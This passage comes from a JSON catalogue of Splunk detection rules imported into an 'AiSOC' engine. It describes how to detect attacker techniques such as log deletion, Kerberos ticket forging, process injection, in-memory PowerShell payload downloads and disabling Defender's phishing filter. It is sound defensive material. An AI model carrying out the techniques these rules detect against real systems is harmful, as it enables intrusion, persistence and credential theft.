directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0f43758f-1fe9-470a-a9e4-780acc4d5407", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_file_transfer_protocol_in_non_common_process_path.yml" } }, { "id": "splunk-security-content-0f701b38-a0fb-43fd-a83d-d12265f71f33", "type": "detection", "name": "ASL AWS Defense Evasion Delete CloudWatch Log Group", "description": "The following analytic detects the deletion of CloudWatch log groups in AWS, identified through `DeleteLogGroup` events in CloudTrail logs. This method leverages Amazon Security Lake logs parsed in the OCSF format. The activity is significant because attackers may delete log groups to evade detection and disrupt logging capabilities, hindering incident response efforts. If confirmed malicious, this action could allow attackers to cover their tracks, making it difficult to trace their activities and potentially leading to undetected data breaches or further malicious actions within the compromised AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-defense-evasion-delete-cloudwatch-log-group.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0f701b38-a0fb-43fd-a83d-d12265f71f33", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_defense_evasion_delete_cloudwatch_log_group.yml" } }, { "id": "splunk-security-content-0f83244b-425b-4528-83db-7a88c5f66e48", "type": "detection", "name": "Kubernetes Nginx Ingress LFI", "description": "The following analytic detects local file inclusion (LFI) attacks targeting Kubernetes Nginx ingress controllers. It leverages Kubernetes logs, parsing fields such as `request` and `status` to identify suspicious patterns indicative of LFI attempts. This activity is significant because LFI attacks can allow attackers to read sensitive files from the server, potentially exposing critical information. If confirmed malicious, this could lead to unauthorized access to sensitive data, further exploitation, and potential compromise of the Kubernetes environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1212" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-nginx-ingress-lfi.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0f83244b-425b-4528-83db-7a88c5f66e48", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_nginx_ingress_lfi.yml" } }, { "id": "splunk-security-content-0fa86e31-0f73-4ec7-9ca3-dc88e117f1db", "type": "detection", "name": "Windows New InProcServer32 Added", "description": "The following analytic detects the addition of new InProcServer32 registry keys on Windows endpoints. It leverages data from the Endpoint.Registry datamodel to identify changes in registry paths associated with InProcServer32. This activity is significant because malware often uses this mechanism to achieve persistence or execute malicious code by registering a new InProcServer32 key pointing to a harmful DLL. If confirmed malicious, this could allow an attacker to persist in the environment or execute arbitrary code, posing a significant threat to system integrity and security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-new-inprocserver32-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0fa86e31-0f73-4ec7-9ca3-dc88e117f1db", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_new_inprocserver32_added.yml" } }, { "id": "splunk-security-content-0fe052a5-07b8-48e7-9fc8-d6a3957eb914", "type": "detection", "name": "Cisco SD-WAN - Low Frequency Rogue Peer", "description": "This analytic identifies low-frequency Cisco SD-WAN control peering activity from control-connection-state-change events where \"new-state:up\".\n\nIt extracts \"peer-type\" and \"peer-system-ip\", groups events by these two fields, and counts how often each combination appears within the selected time window.\n\nCombinations whose count is less than or equal to the defined threshold (currently <=3 occurrences in the search window) are flagged as rare.\n\nAnalysts should prioritize peer identities that are rarely observed in the environment, particularly those involving unexpected peer-type roles or unfamiliar peer-system-ip values.\nRare control-plane peers may indicate misconfiguration, unauthorized SD-WAN components, infrastructure drift, or potentially malicious control-plane connection attempts.\n\nFindings might indicate the potential exploitation of CVE-2026-20127.\n\nNote that the threshold setting is set to \"3\", but its highly recommended that this should be adapted to the environment before deploying this search.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-sd-wan-low-frequency-rogue-peer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0fe052a5-07b8-48e7-9fc8-d6a3957eb914", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_sd_wan___low_frequency_rogue_peer.yml" } }, { "id": "splunk-security-content-102af98d-0ca3-4aa4-98d6-7ab2b98b955a", "type": "detection", "name": "Windows Powershell Import Applocker Policy", "description": "The following analytic detects the import of Windows PowerShell Applocker cmdlets, specifically identifying the use of \"Import-Module Applocker\" and \"Set-AppLockerPolicy\" with an XML policy. It leverages PowerShell Script Block Logging (EventCode 4104) to capture and analyze script block text. This activity is significant as it may indicate an attempt to enforce restrictive Applocker policies, potentially used by malware like Azorult to disable antivirus products. If confirmed malicious, this could allow an attacker to bypass security controls, leading to further system compromise and persistence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powershell-import-applocker-policy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "102af98d-0ca3-4aa4-98d6-7ab2b98b955a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powershell_import_applocker_policy.yml" } }, { "id": "splunk-security-content-10381f93-6d38-470a-9c30-d25478e3bd3f", "type": "detection", "name": "Windows Domain Admin Impersonation Indicator", "description": "The following analytic identifies potential Kerberos ticket forging attacks, specifically the Diamond Ticket attack. This is detected when a user logs into a host and the GroupMembership field in event 4627 indicates a privileged group (e.g., Domain Admins), but the user does not actually belong to that group in the directory service. The detection leverages Windows Security Event Log 4627, which logs account logon events. The analytic cross-references the GroupMembership field from the event against a pre-populated lookup of actual group memberships. Its crucial to note that the accuracy and effectiveness of this detection heavily rely on the users diligence in populating and regularly updating this lookup table. Any discrepancies between the events GroupMembership and the lookup indicate potential ticket forging. Kerberos ticket forging, especially the Diamond Ticket attack, allows attackers to impersonate any user and potentially gain unauthorized access to resources. By forging a ticket that indicates membership in a privileged group, an attacker can bypass security controls and gain elevated privileges. Detecting such discrepancies in group memberships during logon events can be a strong indicator of this attack in progress, making it crucial for security teams to monitor and investigate. If validated as a true positive, this indicates that an attacker has successfully forged a Kerberos ticket and may have gained unauthorized access to critical resources, potentially with elevated privileges.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1558" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-domain-admin-impersonation-indicator.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "10381f93-6d38-470a-9c30-d25478e3bd3f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_domain_admin_impersonation_indicator.yml" } }, { "id": "splunk-security-content-10399c1e-f51e-11eb-b920-acde48001122", "type": "detection", "name": "Create Remote Thread In Shell Application", "description": "The following analytic detects suspicious process injection in command shell applications, specifically targeting `cmd.exe` and `powershell.exe`. It leverages Sysmon EventCode 8 to identify the creation of remote threads within these shell processes. This activity is significant because it is a common technique used by malware, such as IcedID, to inject malicious code and execute it within legitimate processes. If confirmed malicious, this behavior could allow an attacker to execute arbitrary code, escalate privileges, or maintain persistence within the environment, posing a severe threat to system security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/create-remote-thread-in-shell-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "10399c1e-f51e-11eb-b920-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/create_remote_thread_in_shell_application.yml" } }, { "id": "splunk-security-content-103affa6-924a-4b53-aff4-1d5075342aab", "type": "detection", "name": "PowerShell WebRequest Using Memory Stream", "description": "The following analytic detects the use of .NET classes in PowerShell to download a URL payload directly into memory, a common fileless malware staging technique. It leverages PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell commands involving `system.net.webclient`, `system.net.webrequest`, and `IO.MemoryStream`. This activity is significant as it indicates potential fileless malware execution, which is harder to detect and can bypass traditional file-based defenses. If confirmed malicious, this technique could allow attackers to execute code in memory, evade detection, and maintain persistence in the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1105", "T1027.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-webrequest-using-memory-stream.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "103affa6-924a-4b53-aff4-1d5075342aab", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_webrequest_using_memory_stream.yml" } }, { "id": "splunk-security-content-10423ac4-10c9-11ec-8dc4-acde48001122", "type": "detection", "name": "Control Loading from World Writable Directory", "description": "The following analytic identifies instances of control.exe loading a .cpl or .inf file from a writable directory, which is related to CVE-2021-40444. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions mapped to the `Processes` node of the `Endpoint` data model. This activity is significant as it may indicate an attempt to exploit a known vulnerability, potentially leading to unauthorized code execution. If confirmed malicious, this could allow an attacker to gain control over the affected system, leading to further compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/control-loading-from-world-writable-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "10423ac4-10c9-11ec-8dc4-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/control_loading_from_world_writable_directory.yml" } }, { "id": "splunk-security-content-10442d8b-0701-4c25-911d-d67b906e713c", "type": "detection", "name": "Kubernetes Anomalous Inbound Network Activity from Process", "description": "The following analytic identifies anomalous inbound network traffic volumes from processes within containerized workloads. It leverages Network Performance Monitoring metrics collected via an OTEL collector and pulled from Splunk Observability Cloud. The detection compares recent metrics (tcp.bytes, tcp.new_sockets, tcp.packets, udp.bytes, udp.packets) over the last hour with the average over the past 30 days. This activity is significant as it may indicate unauthorized data reception, potential breaches, vulnerability exploitation, or malware propagation. If confirmed malicious, it could lead to command and control installation, data integrity damage, container escape, and further environment compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-anomalous-inbound-network-activity-from-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "10442d8b-0701-4c25-911d-d67b906e713c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_anomalous_inbound_network_activity_from_process.yml" } }, { "id": "splunk-security-content-104658f4-afdc-499e-9719-17243f982681", "type": "detection", "name": "Detect attackers scanning for vulnerable JBoss servers", "description": "The following analytic identifies specific GET or HEAD requests to web servers that indicate reconnaissance attempts to find vulnerable JBoss servers. It leverages data from the Web data model, focusing on HTTP methods and URLs associated with JBoss management interfaces. This activity is significant because it often precedes exploitation attempts using tools like JexBoss, which can compromise the server. If confirmed malicious, attackers could gain unauthorized access, execute arbitrary code, or escalate privileges, leading to potential data breaches and system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1082", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-attackers-scanning-for-vulnerable-jboss-servers.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "104658f4-afdc-499e-9719-17243f982681", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/detect_attackers_scanning_for_vulnerable_jboss_servers.yml" } }, { "id": "splunk-security-content-104658f4-afdc-499e-9719-17243f9826f1", "type": "detection", "name": "Excessive DNS Failures", "description": "The following analytic identifies excessive DNS query failures by counting DNS responses that do not indicate success, triggering when there are more than 50 occurrences. It leverages the Network_Resolution data model, focusing on DNS reply codes that signify errors. This activity is significant because a high number of DNS failures can indicate potential network misconfigurations, DNS poisoning attempts, or malware communication issues. If confirmed malicious, this activity could lead to disrupted network services, hindered communication, or data exfiltration attempts by attackers.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/excessive-dns-failures.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "104658f4-afdc-499e-9719-17243f9826f1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/excessive_dns_failures.yml" } }, { "id": "splunk-security-content-105e4a69-ec55-49fc-be1f-902467435ea8", "type": "detection", "name": "Cisco AI Defense Security Alerts by Application Name", "description": "The search surfaces alerts from the Cisco AI Defense product for potential attacks against the AI models running in your environment. This analytic identifies security events within Cisco AI Defense by examining event messages, actions, and policy names. It focuses on connections and applications associated with specific guardrail entities and ruleset types. By aggregating and analyzing these elements, the search helps detect potential policy violations and security threats, enabling proactive defense measures and ensuring network integrity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-ai-defense-security-alerts-by-application-name.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "105e4a69-ec55-49fc-be1f-902467435ea8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_ai_defense_security_alerts_by_application_name.yml" } }, { "id": "splunk-security-content-10ca081c-57b1-4a78-ba56-14a40a7e116a", "type": "detection", "name": "Windows Impair Defense Overide Win Defender Phishing Filter", "description": "The following analytic detects modifications to the Windows registry that disable the Windows Defender phishing filter. It leverages data from the Endpoint.Registry data model, focusing on changes to specific registry values related to Microsoft Edge's phishing filter settings. This activity is significant because disabling the phishing filter can allow attackers to deceive users into visiting malicious websites without triggering browser warnings. If confirmed malicious, this could lead to users unknowingly accessing harmful sites, resulting in potential security incidents or data compromises.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-overide-win-defender-phishing-filter.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "10ca081c-57b1-4a78-ba56-14a40a7e116a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_overide_win_defender_phishing_filter.yml" } }, { "id": "splunk-security-content-10d62950-0de5-4199-a710-cff9ea79b413", "type": "detection", "name": "Elevated Group Discovery with PowerView", "description": "The following analytic detects the execution of the `Get-DomainGroupMember` cmdlet from PowerView, identified through PowerShell Script Block Logging (EventCode=4104). This cmdlet is used to enumerate members of elevated domain groups such as Domain Admins and Enterprise Admins. Monitoring this activity is crucial as it indicates potential reconnaissance efforts by adversaries to identify high-privileged users within the domain. If confirmed malicious, this activity could lead to targeted attacks on privileged accounts, facilitating further compromise and lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/elevated-group-discovery-with-powerview.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "10d62950-0de5-4199-a710-cff9ea79b413", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/elevated_group_discovery_with_powerview.yml" } }, { "id": "splunk-security-content-10ec9031-015b-4617-b453-c0c1ab729007", "type": "detection", "name": "Azure AD OAuth Application Consent Granted By User", "description": "The following analytic detects when a user in an Azure AD environment grants consent to an OAuth application. It leverages Azure AD audit logs to identify events where users approve application consents. This activity is significant as it can expose organizational data to third-party applications, a common tactic used by malicious actors to gain unauthorized access. If confirmed malicious, this could lead to unauthorized access to sensitive information and resources. Immediate investigation is required to validate the application's legitimacy, review permissions, and mitigate potential risks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1528" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-oauth-application-consent-granted-by-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "10ec9031-015b-4617-b453-c0c1ab729007", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_oauth_application_consent_granted_by_user.yml" } }, { "id": "splunk-security-content-10f2bae0-bbe6-4984-808c-37dc1c67980d", "type": "detection", "name": "Detect Baron Samedit CVE-2021-3156 Segfault", "description": "The following analytic identifies a heap-based buffer overflow in sudoedit by detecting Linux logs containing both \"sudoedit\" and \"segfault\" terms. This detection leverages Splunk to monitor for more than five occurrences of these terms on a single host within a specified timeframe. This activity is significant because exploiting this vulnerability (CVE-2021-3156) can allow attackers to gain root privileges, leading to potential system compromise, unauthorized access, and data breaches. If confirmed malicious, this could result in elevated privileges and full control over the affected system, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-baron-samedit-cve-2021-3156-segfault.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "10f2bae0-bbe6-4984-808c-37dc1c67980d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_baron_samedit_cve_2021_3156_segfault.yml" } }, { "id": "splunk-security-content-1120a204-8444-428b-8657-6ea4e1f3e840", "type": "detection", "name": "Windows Unusual NTLM Authentication Users By Destination", "description": "The following analytic detects when a device is the target of numerous NTLM authentications using a null domain. This activity generally results when an attacker attempts to brute force, password spray, or otherwise authenticate to a domain joined Windows device from a non-domain device. This activity may also generate a large number of EventID 4776 events in tandem, however these events will not indicate the attacker or target device.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-unusual-ntlm-authentication-users-by-destination.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1120a204-8444-428b-8657-6ea4e1f3e840", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_unusual_ntlm_authentication_users_by_destination.yml" } }, { "id": "splunk-security-content-112638b4-4634-11ec-b9ab-3e22fbd008af", "type": "detection", "name": "Remote Process Instantiation via WMI and PowerShell", "description": "The following analytic detects the execution of `powershell.exe` using the `Invoke-WmiMethod` cmdlet to start a process on a remote endpoint via WMI. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions and process telemetry. This activity is significant as it indicates potential lateral movement or remote code execution attempts by adversaries. If confirmed malicious, this could allow attackers to execute arbitrary code on remote systems, leading to further compromise and persistence within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/remote-process-instantiation-via-wmi-and-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "112638b4-4634-11ec-b9ab-3e22fbd008af", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/remote_process_instantiation_via_wmi_and_powershell.yml" } }, { "id": "splunk-security-content-114c616b-c793-465d-a80d-758c9fe8a704", "type": "detection", "name": "Cisco Duo Policy Allow Devices Without Screen Lock", "description": "The following analytic detects when a Duo policy is created or updated to allow devices without a screen lock requirement. It identifies this behavior\nby searching Duo administrator activity logs for policy creation or update events where the 'require_lock' setting is set to false. This action may indicate\na weakening of device security controls, potentially exposing the organization to unauthorized access if devices are lost or stolen. For a Security Operations\nCenter (SOC), identifying such policy changes is critical, as attackers or malicious insiders may attempt to lower authentication standards to facilitate\nunauthorized access. The impact of this attack could include increased risk of credential compromise, data breaches, or lateral movement within the\nenvironment due to reduced device security requirements.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-duo-policy-allow-devices-without-screen-lock.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "114c616b-c793-465d-a80d-758c9fe8a704", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_duo_policy_allow_devices_without_screen_lock.yml" } }, { "id": "splunk-security-content-114c6bfe-9406-11ec-bcce-acde48001122", "type": "detection", "name": "Disabled Kerberos Pre-Authentication Discovery With Get-ADUser", "description": "The following analytic detects the execution of the `Get-ADUser` PowerShell cmdlet with parameters indicating a search for domain accounts with Kerberos Pre-Authentication disabled. It leverages PowerShell Script Block Logging (EventCode=4104) to identify this specific activity. This behavior is significant because discovering accounts with Kerberos Pre-Authentication disabled can allow adversaries to perform offline password cracking. If confirmed malicious, this activity could lead to unauthorized access to user accounts, potentially compromising sensitive information and escalating privileges within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1558.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disabled-kerberos-pre-authentication-discovery-with-get-aduser.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "114c6bfe-9406-11ec-bcce-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disabled_kerberos_pre_authentication_discovery_with_get_aduser.yml" } }, { "id": "splunk-security-content-1155e47d-307f-4247-beab-71071e3a458c", "type": "detection", "name": "Windows AD SID History Attribute Modified", "description": "The following analytic detects modifications to the SID History attribute in Active Directory by leveraging event code 5136. This detection uses logs from the `wineventlog_security` data source to identify changes to the sIDHistory attribute. Monitoring this activity is crucial as the SID History attribute can be exploited by adversaries to inherit permissions from other accounts, potentially granting unauthorized access. If confirmed malicious, this activity could allow attackers to maintain persistent access and escalate privileges within the domain, posing a significant security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1134.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-sid-history-attribute-modified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1155e47d-307f-4247-beab-71071e3a458c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_sid_history_attribute_modified.yml" } }, { "id": "splunk-security-content-115bebac-0976-4f7d-a3ec-d1fb45a39a11", "type": "detection", "name": "Confluence Data Center and Server Privilege Escalation", "description": "The following analytic identifies potential exploitation attempts on a known vulnerability in Atlassian Confluence, specifically targeting the /setup/*.action* URL pattern. It leverages web logs within the Splunk 'Web' Data Model, filtering for successful accesses (HTTP status 200) to these endpoints. This activity is significant as it suggests attackers might be exploiting a privilege escalation flaw in Confluence. If confirmed malicious, it could result in unauthorized access or account creation with escalated privileges, leading to potential data breaches or further exploitation within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/confluence-data-center-and-server-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "115bebac-0976-4f7d-a3ec-d1fb45a39a11", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/confluence_data_center_and_server_privilege_escalation.yml" } }, { "id": 